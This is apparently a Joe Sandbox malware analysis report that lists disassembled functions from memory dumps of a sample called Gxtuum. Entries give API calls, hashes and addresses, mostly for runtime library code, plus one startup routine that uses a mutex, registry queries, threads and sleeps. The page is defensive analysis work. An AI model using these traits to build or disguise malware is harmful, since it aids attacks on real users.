Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd

Similarity

API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 1206951868-0
Opcode ID: 1cc8a59d5013fb2b2e6b7a432353573f0b7417d84a0ac8cf00c068eaae57a3e8
Instruction ID: 3716f6dd041ed6623868c3c0883e798dcf79b5caefb4e3dead37e92231efa9da
Opcode Fuzzy Hash: 1cc8a59d5013fb2b2e6b7a432353573f0b7417d84a0ac8cf00c068eaae57a3e8
Instruction Fuzzy Hash: 30412C75900208ABCF29DFE5EC459EBBBF9EF89300B144529F956D3611EB71A980CB21

Function 00105300 Relevance: 7.6, APIs: 5, Instructions: 107COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00105336
std::_Lockit::_Lockit.LIBCPMT ref: 00105356
std::_Lockit::~_Lockit.LIBCPMT ref: 00105376
std::_Facet_Register.LIBCPMT ref: 00105411
std::_Lockit::~_Lockit.LIBCPMT ref: 00105429

Memory Dump Source

Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: bd449b1cf50f1b0824b864cc7753df62ef5c963a84b140ba91e0b8d1ed115ec9
Instruction ID: 5c47ffdc3bc80415db7d80dfaff98fb4109c58f0514668b30f5c2923fe6a5cd5
Opcode Fuzzy Hash: bd449b1cf50f1b0824b864cc7753df62ef5c963a84b140ba91e0b8d1ed115ec9
Instruction Fuzzy Hash: 1F41DB71A046148BCB24DF94D891BAFB7B1FB10750F14416DE885AB2D2DBB0AD41CFC0

Function 001212AB Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 001212C3

Part of subcall function 001185A6: HeapFree.KERNEL32(00000000,00000000,?,0012154C,?,00000000,?,?,?,001217EF,?,00000007,?,?,00121C94,?), ref: 001185BC
Part of subcall function 001185A6: GetLastError.KERNEL32(?,?,0012154C,?,00000000,?,?,?,001217EF,?,00000007,?,?,00121C94,?,?), ref: 001185CE

_free.LIBCMT ref: 001212D5
_free.LIBCMT ref: 001212E7
_free.LIBCMT ref: 001212F9
_free.LIBCMT ref: 0012130B

Memory Dump Source

Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 57c3080107bfd6484526c6dc4c0b97262882e65fdfd59cad3f49b8994cab46f8
Instruction ID: 40c2ab29af0652240c3ab8723107d59f5a7215e96ea344e2803d8fa996e69510
Opcode Fuzzy Hash: 57c3080107bfd6484526c6dc4c0b97262882e65fdfd59cad3f49b8994cab46f8
Instruction Fuzzy Hash: 2DF0FF32504710B7C668DB65F8C1C9AB3EAEBA27247644815F008E7A11CB64FCD04664

Function 000E4910 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 64COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 000E499F

Part of subcall function 0010B446: RaiseException.KERNEL32(E06D7363,00000001,00000003,00143A84,?,?,?,00143A84), ref: 0010B4A6

Strings

ios_base::eofbit set, xrefs: 000E4954
ios_base::badbit set, xrefs: 000E4945
ios_base::failbit set, xrefs: 000E494F

Memory Dump Source

Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 3109751735-1866435925
Opcode ID: 55b5a8be54027fd119b72b352665439b9a0c73d6b4be37d0a33d50e2c51a3bac
Instruction ID: 846e26d5a2fd8925943d3f2320ee7275e11263505f9480d6d21ffe2b15cf7c1b
Opcode Fuzzy Hash: 55b5a8be54027fd119b72b352665439b9a0c73d6b4be37d0a33d50e2c51a3bac
Instruction Fuzzy Hash: 111138B1600744AFC710DF59C942B97B7ECEF51310F14852AF865BB682EBB0E914CB91

Function 001195B5 Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0011963F

Memory Dump Source

Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: c17452bd9d257a50ccdb3366d6f14b865b7cd1596f197bae603c132cad26c692
Instruction ID: 01b1fa65dc316c254c0790501d370e3f2fd7fcbdf83ec27eb9505082b9956c75
Opcode Fuzzy Hash: c17452bd9d257a50ccdb3366d6f14b865b7cd1596f197bae603c132cad26c692
Instruction Fuzzy Hash: 36B147729002859FDB19CF68C8A1BFEBBE5EF55300F15407AE865DB281D7348D81CB60

Function 000E93D0 Relevance: 6.2, APIs: 4, Instructions: 181COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(0000011C,07E9847F,0000000F,00000000), ref: 000E944A

Memory Dump Source

Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 28bad304fe7bea6b9131247cbe0ef3a1ee5b4fd27d872064cda03ce25c4a5f77
Instruction ID: fda2fdee2f281e772ddecb87264bcdfa4d902b2b1d0ea37ff1da1a9c68973c16
Opcode Fuzzy Hash: 28bad304fe7bea6b9131247cbe0ef3a1ee5b4fd27d872064cda03ce25c4a5f77
Instruction Fuzzy Hash: 8261E9B0E04284AFDF20EB69DD467ADBBB5EB52314F50029DE441B72D2DB754AC48BC2

Function 0010CEBB Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 0010CF82
___AdjustPointer.LIBCMT ref: 0010CFA5
___AdjustPointer.LIBCMT ref: 0010D041

Memory Dump Source

Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 8caa5cf7941ff8a791b1a94f130300ff0b3d953928c159b0c508f2b09e30ffb7
Instruction ID: a5923b7cfc2afc90f983661ba7d73fd6d8d74e19b643899eda53915f1eb4d227
Opcode Fuzzy Hash: 8caa5cf7941ff8a791b1a94f130300ff0b3d953928c159b0c508f2b09e30ffb7
Instruction Fuzzy Hash: CA51E172605207AFDB289F50D881BAAB7A6FF14700F244229F885972E1D7B1ED41CFD1

Function 000E9A20 Relevance: 6.2, APIs: 4, Instructions: 155libraryloaderCOMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(0000011C,?,07E9847F), ref: 000E9A99
GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 000E9B00
GetProcAddress.KERNEL32(00000000), ref: 000E9B07

Memory Dump Source

Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd

Similarity

API ID: AddressHandleModuleProcVersion
String ID:
API String ID: 3310240892-0
Opcode ID: 921936cf9502d40d143e2decb72a07f909509c135ad63afe9d934b7865cb02ac
Instruction ID: b8a5d84292d5f67c145da9afd0099f7395e6fd822e60d0df30a262ccbf444220
Opcode Fuzzy Hash: 921936cf9502d40d143e2decb72a07f909509c135ad63afe9d934b7865cb02ac
Instruction Fuzzy Hash: DA5127709142889FDB24EB29DE497DDBB75EF45310F5042A8E805A72D1EB704AC0CB91

Function 00106210 Relevance: 6.1, APIs: 4, Instructions: 141COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 001062E7
std::_Rethrow_future_exception.LIBCPMT ref: 00106339
std::_Rethrow_future_exception.LIBCPMT ref: 00106349

Part of subcall function 000E3A60: __Mtx_unlock.LIBCPMT ref: 000E3B54

Memory Dump Source

Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd

Similarity

API ID: Mtx_unlockRethrow_future_exceptionstd::_
String ID:
API String ID: 3298230783-0
Opcode ID: 3bd39c0e4d6028ef6276121483db83c23e5888beba85ebc48b4af371c2741027
Instruction ID: e32fe690e370cc555eb649cf8d4d71c2e879b554a2a1d7c2794849c83b0efb80
Opcode Fuzzy Hash: 3bd39c0e4d6028ef6276121483db83c23e5888beba85ebc48b4af371c2741027
Instruction Fuzzy Hash: B4411B71D043489FCB14EBA4D842BAFBBF8AF15300F04456DF5C667682EBB1A954C7A2

Function 0012757E Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0012764E
_free.LIBCMT ref: 00127677
SetEndOfFile.KERNEL32(00000000,00123DDD,00000000,00124074,?,?,?,?,?,?,?,00123DDD,00124074,00000000), ref: 001276A9
GetLastError.KERNEL32(?,?,?,?,?,?,?,00123DDD,00124074,00000000,?,?,?,?,00000000), ref: 001276C5

Memory Dump Source

Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd

Similarity

API ID: _free$ErrorFileLast
String ID:
API String ID: 1547350101-0
Opcode ID: 4388c322e436392a6eee88aa10940de72518c2eb8fa8ed170e25b94257d4bc0c
Instruction ID: cc91060b48bd517ffa1f3f39da9b4a0dc287580d4606065f092639bd75e8f755
Opcode Fuzzy Hash: 4388c322e436392a6eee88aa10940de72518c2eb8fa8ed170e25b94257d4bc0c
Instruction Fuzzy Hash: 2F41EB72904A11ABEB196BBCEC46BDF7B75EF64360F150524F924E72D1DB30C8A08761

Function 0010EEA6 Relevance: 6.1, APIs: 4, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa2869baae827bbf2c0cbb87f441bb52e2068861ddc2c2efb43795955b89bc1f
Instruction ID: b53bc83b5615dc4c73a9f20fbb01cf9fc5d2f354a7238341a6ce718b0dc673bf
Opcode Fuzzy Hash: aa2869baae827bbf2c0cbb87f441bb52e2068861ddc2c2efb43795955b89bc1f
Instruction Fuzzy Hash: 0B41C871A00755AFE724AF39CC41B9ABBE9EB98710F10892EF151DB2C1D7B1A9418790

Function 000E2F00 Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 000E2F9F
GetCurrentThreadId.KERNEL32 ref: 000E2FAB
__Mtx_unlock.LIBCPMT ref: 000E2FF2
__Cnd_broadcast.LIBCPMT ref: 000E2FFB

Memory Dump Source

Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd

Similarity

API ID: Mtx_unlock$Cnd_broadcastCurrentThread
String ID:
API String ID: 3264154886-0
Opcode ID: 3a56161af42544b5c251a570496f55a5d441fa074f635a274809288984a2a572
Instruction ID: fa1c9ae8dc4ef389e07ba0a4715b50c144d7b6d32d5a31cf407337ac83f1f98a
Opcode Fuzzy Hash: 3a56161af42544b5c251a570496f55a5d441fa074f635a274809288984a2a572
Instruction Fuzzy Hash: 7541CCB1A016159FCB15DB35C844B5ABBE8FF29310F004539E85AD7791EB71EA00CBC1

Function 0011F3A3 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 0010ED48: _free.LIBCMT ref: 0010ED56

Part of subcall function 0011E84F: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,0011C9D2,?,00000000,00000000), ref: 0011E8FB

GetLastError.KERNEL32 ref: 0011F40B
__dosmaperr.LIBCMT ref: 0011F412
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0011F451
__dosmaperr.LIBCMT ref: 0011F458

Memory Dump Source

Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: 8d68cac06b68c37e2d1b58b6802c5751203101cde779d01926792055c2200ba1
Instruction ID: 2519a72800777708db05bd45e726568234723f72255af1eaecbabe9360fffb61
Opcode Fuzzy Hash: 8d68cac06b68c37e2d1b58b6802c5751203101cde779d01926792055c2200ba1
Instruction Fuzzy Hash: E721B071600219BF9B28AF668C809EBB7A8EF10364714853DF96997550DB31ECC1C760

Function 001171C0 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0010E627,?,?,?,?,0010F4C2,?), ref: 001171C5
_free.LIBCMT ref: 00117222
_free.LIBCMT ref: 00117258
SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,0010E627,?,?,?,?,0010F4C2,?), ref: 00117263

Memory Dump Source

Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 74ef48cd130f7ebab0b2fd09f384525e8e8303748d863df6e2d38fc8b956bdb8
Instruction ID: 6cedb3d341b795c08f1ba0de6337a1556594f02c89d8c4516513307c4e2bb3ba
Opcode Fuzzy Hash: 74ef48cd130f7ebab0b2fd09f384525e8e8303748d863df6e2d38fc8b956bdb8
Instruction Fuzzy Hash: 2811A33220C2017BDB5D26B4AC81EEB297A9BE37747250735F524966F1DF66CCC28111

Function 00108458 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

Part of subcall function 001083B9: GetModuleHandleExW.KERNEL32(00000002,00000000,?,?,?,0010840B,00000014,?,0010844C,00000014,?,000E2D32,00000000,00000014), ref: 001083C5

__Mtx_unlock.LIBCPMT ref: 0010849E
FreeLibraryWhenCallbackReturns.KERNEL32(?,00000000,07E9847F,?,?,?,00128C80,000000FF), ref: 001084C6
__Mtx_unlock.LIBCPMT ref: 00108501
__Cnd_broadcast.LIBCPMT ref: 00108512

Memory Dump Source

Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd

Similarity

API ID: Mtx_unlock$CallbackCnd_broadcastFreeHandleLibraryModuleReturnsWhen
String ID:
API String ID: 420990631-0
Opcode ID: 20af30d7fc71244f302fc4519c4a46978b32a6c03fcfbd8f4f8986cf6a4a4e9d
Instruction ID: c2bb85020cefce62641b22f8cebe3d81004edb007d4a1bb1f73f5a8b5f47f36e
Opcode Fuzzy Hash: 20af30d7fc71244f302fc4519c4a46978b32a6c03fcfbd8f4f8986cf6a4a4e9d
Instruction Fuzzy Hash: B911E976508600ABCA117B65EC12B5F7BA8FB51B20F00481AF9C5E76E3DFB5D840C6A0

Function 0011A28F Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(00000020,00000000,?,00000000,?,00000000,?,00125D87,?,?,?,00000020,00000001), ref: 0011A2A5
GetLastError.KERNEL32(?,00125D87,?,?,?,00000020,00000001), ref: 0011A2AF
__dosmaperr.LIBCMT ref: 0011A2B6

Memory Dump Source

Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd

Similarity

API ID: ErrorFullLastNamePath__dosmaperr
String ID:
API String ID: 2398240785-0
Opcode ID: 885961711c0ded4a78935e1c18a568344250139ef94ea04fe8ce577d5a9e2330
Instruction ID: ac81fe219bc3305816dd828c466c8ad27c13f306ee26b6485776db3299325709
Opcode Fuzzy Hash: 885961711c0ded4a78935e1c18a568344250139ef94ea04fe8ce577d5a9e2330
Instruction Fuzzy Hash: D1F06D32201115BBCB282BA6DC089CAFF69FF457A03458120F619D7420DB32E8D0D7D1

Function 0011A2F8 Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(00000020,00000000,?,00000000,?,00000000,?,00125D12,?,?,?,?,00000020,00000001), ref: 0011A30E
GetLastError.KERNEL32(?,00125D12,?,?,?,?,00000020,00000001), ref: 0011A318
__dosmaperr.LIBCMT ref: 0011A31F

Memory Dump Source

Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd

Similarity

API ID: ErrorFullLastNamePath__dosmaperr
String ID:
API String ID: 2398240785-0
Opcode ID: 1b8f57ee2494ed271acb999287088241758babf67f1355bb912033bc68c21171
Instruction ID: 35c6b7208746c8cf27528781a3b49847b3170406726f086c83d59a812099841b
Opcode Fuzzy Hash: 1b8f57ee2494ed271acb999287088241758babf67f1355bb912033bc68c21171
Instruction Fuzzy Hash: 87F01D32601115BBCB295FA6DC08ADAFF69FF447A03598531F629D7420DB31E890DBD1

Function 001011A0 Relevance: 6.0, APIs: 4, Instructions: 37threadsleepCOMMON

Download Yara Rule

APIs

Part of subcall function 000EC730: Sleep.KERNELBASE(00000096), ref: 000EC6D6
Part of subcall function 000EC730: CreateMutexA.KERNELBASE(00000000,00000000,00147494), ref: 000EC6F4
Part of subcall function 000EC730: GetLastError.KERNEL32 ref: 000EC6FC
Part of subcall function 000EC730: GetLastError.KERNEL32 ref: 000EC70D

Part of subcall function 000E61F0: RegOpenKeyExA.ADVAPI32(?,00000000), ref: 000E67BD
Part of subcall function 000E61F0: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 000E6894

CreateThread.KERNEL32(00000000,00000000,00100F90,00000000,00000000,00000000), ref: 00101166
CreateThread.KERNEL32(00000000,00000000,Function_00021020,00000000,00000000,00000000), ref: 00101177
CreateThread.KERNEL32(00000000,00000000,Function_000210B0,00000000,00000000,00000000), ref: 00101188
Sleep.KERNEL32(00007530), ref: 00101195

Memory Dump Source

Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd

Similarity

API ID: Create$Thread$ErrorLastSleep$InfoMutexOpenQuery
String ID:
API String ID: 1072900782-0
Opcode ID: 5c8b82c83f91aba404bc22da6582f29a9be4615ab6ee4521390e95646fc95cc5
Instruction ID: 2c0d961a3690f5c2fd73a51e9dd3294d9602dec9eede23f2dfedc44161cc19ed
Opcode Fuzzy Hash: 5c8b82c83f91aba404bc22da6582f29a9be4615ab6ee4521390e95646fc95cc5
Instruction Fuzzy Hash: A0F0E531BD835876F13437A51C07FEA29045B08F91F340112B7A97E5C65EC5358066AF

Function 001278EA Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,001243D2,00000000,00000001,00000000,00000000,?,00117F36,?,?,00000000), ref: 00127901
GetLastError.KERNEL32(?,001243D2,00000000,00000001,00000000,00000000,?,00117F36,?,?,00000000,?,00000000,?,00118482,?), ref: 0012790D

Part of subcall function 001278D3: CloseHandle.KERNEL32(FFFFFFFE,0012791D,?,001243D2,00000000,00000001,00000000,00000000,?,00117F36,?,?,00000000,?,00000000), ref: 001278E3

___initconout.LIBCMT ref: 0012791D

Part of subcall function 00127895: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,001278C4,001243BF,00000000,?,00117F36,?,?,00000000,?), ref: 001278A8

WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,001243D2,00000000,00000001,00000000,00000000,?,00117F36,?,?,00000000,?), ref: 00127932

Memory Dump Source

Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: f0ff351726600f56bf03f9c48e12c9df535d54eabd3648a5c6ad2d8e2aff0c3b
Instruction ID: a5fab39a772c374668663e7a4972fa37f32441ab9ad3699f56f8c97b5a8a5db8
Opcode Fuzzy Hash: f0ff351726600f56bf03f9c48e12c9df535d54eabd3648a5c6ad2d8e2aff0c3b
